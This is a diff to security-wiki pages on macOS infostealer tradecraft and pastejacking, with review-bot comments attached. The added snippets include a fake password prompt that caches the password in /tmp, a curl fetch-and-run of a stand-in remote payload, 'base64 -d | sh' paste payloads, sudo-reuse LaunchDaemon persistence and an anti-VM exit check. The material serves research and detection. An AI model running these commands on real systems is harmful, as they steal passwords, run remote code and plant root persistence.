diff --git a/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md index c6678274b74..a52d4998927 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md @@ -10,6 +10,10 @@ Clipboard hijacking – also known as *pastejacking* – abuses the fact that us Because **no file is downloaded and no attachment is opened**, the technique bypasses most e-mail and web-content security controls that monitor attachments, macros or direct command execution. The attack is therefore popular in phishing campaigns delivering commodity malware families such as NetSupport RAT, Latrodectus loader or Lumma Stealer. +## Forced copy buttons and hidden payloads (macOS one-liners) + +Some macOS infostealers clone installer sites (e.g., Homebrew) and **force use of a “Copy” button** so users cannot highlight only the visible text. The clipboard entry contains the expected installer command plus an appended Base64 payload (e.g., `...; echo | base64 -d | sh`), so a single paste executes both while the UI hides the extra stage. + ## JavaScript Proof-of-Concept ```html @@ -203,5 +207,6 @@ homograph-attacks.md - [Pastejacking PoC – GitHub](https://github.com/dxa4481/Pastejacking) - [Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/) - [The ClickFix Factory: First Exposure of IUAM ClickFix Generator](https://unit42.paloaltonetworks.com/clickfix-generator-first-of-its-kind/) +- [2025, the year of the Infostealer](https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/) {{#include ../../banners/hacktricks-training.md}} \ No newline at end of file 
diff --git a/src/macos-hardening/macos-auto-start-locations.md b/src/macos-hardening/macos-auto-start-locations.md index 3b44e7ebbfa..c3efe30697f 100644 --- a/src/macos-hardening/macos-auto-start-locations.md +++ b/src/macos-hardening/macos-auto-start-locations.md @@ -88,6 +88,21 @@ List all the agents and daemons loaded by the current user: launchctl list ``` +#### Example malicious LaunchDaemon chain (password reuse) + +A recent macOS infostealer reused a **captured sudo password** to drop a user agent and a root LaunchDaemon: + +- Write the agent loop to `~/.agent` and make it executable. +- Generate a plist in `/tmp/starter` pointing to that agent. +- Reuse the stolen password with `sudo -S` to copy it into `/Library/LaunchDaemons/com.finder.helper.plist`, set `root:wheel`, and load it with `launchctl load`. +- Start the agent silently via `nohup ~/.agent >/dev/null 2>&1 &` to detach output. + +```bash +printf '%s\n' "$pw" | sudo -S cp /tmp/starter /Library/LaunchDaemons/com.finder.helper.plist +printf '%s\n' "$pw" | sudo -S chown root:wheel /Library/LaunchDaemons/com.finder.helper.plist +printf '%s\n' "$pw" | sudo -S launchctl load /Library/LaunchDaemons/com.finder.helper.plist +nohup "$HOME/.agent" >/dev/null 2>&1 & +``` > [!WARNING] > If a plist is owned by a user, even if it's in a daemon system wide folders, the **task will be executed as the user** and not as root. This can prevent some privilege escalation attacks. @@ -1793,6 +1808,10 @@ RunService () - [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift) - [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA) +## References + +- [2025, the year of the Infostealer](https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/) + {{#include ../banners/hacktricks-training.md}} 
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md index c9309a9ad1f..cde16ede5cc 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md @@ -209,6 +209,29 @@ killall Dock {{#endtab}} {{#endtabs}} +### Password prompt phishing + sudo reuse + +Malware frequently abuses user interaction to **capture a sudo-capable password** and reuse it programmatically. A common flow: + +1. Identify the logged in user with `whoami`. +2. **Loop password prompts** until `dscl . -authonly "$user" "$pw"` returns success. +3. Cache the credential (e.g., `/tmp/.pass`) and drive privileged actions with `sudo -S` (password over stdin). + +Example minimal chain: + +```bash +user=$(whoami) +while true; do + read -s -p "Password: " pw; echo + dscl . -authonly "$user" "$pw" && break +done +printf '%s\n' "$pw" > /tmp/.pass +curl -o /tmp/update https://example.com/update +printf '%s\n' "$pw" | sudo -S xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update +``` + +The stolen password can then be reused to **clear Gatekeeper quarantine with `xattr -c`**, copy LaunchDaemons or other privileged files, and run additional stages non-interactively. + ## TCC - Root Privilege Escalation ### CVE-2020-9771 - mount_apfs TCC bypass and privilege escalation @@ -247,6 +270,10 @@ This can be useful to escalate privileges: macos-files-folders-and-binaries/macos-sensitive-locations.md {{#endref}} +## References + +- [2025, the year of the Infostealer](https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/) + {{#include ../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-useful-commands.md b/src/macos-hardening/macos-useful-commands.md index c5cbf59fb0a..a0315e10839 100644 
--- a/src/macos-hardening/macos-useful-commands.md +++ b/src/macos-hardening/macos-useful-commands.md @@ -117,6 +117,16 @@ dscacheutil -flushcache sudo killall -HUP mDNSResponder ``` +### Quick anti-analysis / virtualization check + +Some macOS stealers call `system_profiler` to detect VMs and **abort with a distinct exit code (e.g., 100)** to avoid sandbox detonation: + +```bash +if system_profiler SPHardwareDataType SPDisplaysDataType | grep -Eiq 'qemu|kvm|vmware|virtualbox'; then + exit 100 +fi +``` + ### Installed Software & Services Check for **suspicious** applications installed and **privileges** over the.installed resources: @@ -147,6 +157,10 @@ Without prompts
+## References + +- [2025, the year of the Infostealer](https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/) + {{#include ../banners/hacktricks-training.md}}
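Review bot: the inline payload fragment in the new "Forced copy buttons and hidden payloads" section of clipboard-hijacking.md (`...; echo | base64 -d | sh`) does not illustrate what the sentence describes, because `echo` with no argument feeds only a newline into `base64 -d`; write the encoded part as an explicit placeholder such as `echo <BASE64> | base64 -d | sh` so readers can see where the hidden stage sits. The paragraph also stops at describing the trick; given the page's point that nothing is downloaded or opened, add one sentence on what a reader can check, namely that the clipboard entry is longer than the text shown on the page and that pasting into a plain text editor before the terminal exposes the appended stage.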
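Review bot: the reference added to clipboard-hijacking.md breaks the list's existing "Source – Title" convention (the neighbouring entries read "Check Point Research – ..." and "Pastejacking PoC – GitHub"); make it `- [Pen Test Partners – 2025, the year of the Infostealer](https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/)`. The hunk also leaves the `\ No newline at end of file` condition in place; add the trailing newline while touching this line.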
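Review bot: in the macos-auto-start-locations.md hunk the bullet list promises four steps but the code block only covers the last two: `$pw` is never assigned and `/tmp/starter` is never written, so the block cannot be read on its own. Either state that `$pw` and `/tmp/starter` come from the earlier stealer stage (the password-capture flow added to the privilege-escalation page in this same patch) or point at the plist format already covered on this page. The closing ``` is also followed directly by the existing `> [!WARNING]` callout with no blank line between them; add one. Since the rest of this page reads as a hunting guide, it is worth spelling out what makes this chain stand out for detection: a root-owned plist in `/Library/LaunchDaemons` with a Finder-like label whose program is a hidden dotfile in a user's home directory, installed through `sudo -S` from a non-interactive process.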
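Review bot: the new `## References` heading in macos-auto-start-locations.md is inserted directly after a list that already consists of reference links (`Persistent-Swift`, `PersistentJXA`), so the file may end up with two reference blocks back to back. Check the heading that introduces those existing links; if it is already a references section, append the Pen Test Partners link to that list instead of adding a second heading.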
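Review bot: in the macos-privilege-escalation.md hunk the final line runs `sudo -S xattr -c /tmp/update`, but removing extended attributes from a file the current user has just written to `/tmp` needs no root, so that command does not demonstrate the privileged reuse the section is about, and the following sentence ("clear Gatekeeper quarantine with `xattr -c`") should be qualified to say that the password is what enables the LaunchDaemon copy and the other privileged steps, not the `xattr` call. The defensive takeaway should also be stated: the prompt is a plain `read -s -p` in the terminal rather than a system authentication dialog, and the flow leaves the password in clear text in `/tmp/.pass`, both of which are concrete things an analyst can look for when triaging a host.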
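Review bot: the `exit 100` in the new virtualization-check block in macos-useful-commands.md will terminate the reader's interactive shell if the snippet is pasted as-is, since it is not wrapped in a function or subshell; either wrap it in `( ... )` or make explicit that the block documents stealer behaviour rather than a command to run. The heading "Quick anti-analysis / virtualization check" reads as a recommended procedure on a page of useful commands; rename it so it is clear this is malware behaviour, and add the analyst-facing point the surrounding text implies: a sample that calls `system_profiler` and exits immediately with status 100 is the fingerprint this section describes, and a sandbox whose profiler output contains these vendor strings will never reach the payload stage. While here, the pre-existing typo "the.installed resources" in the following context line could be fixed.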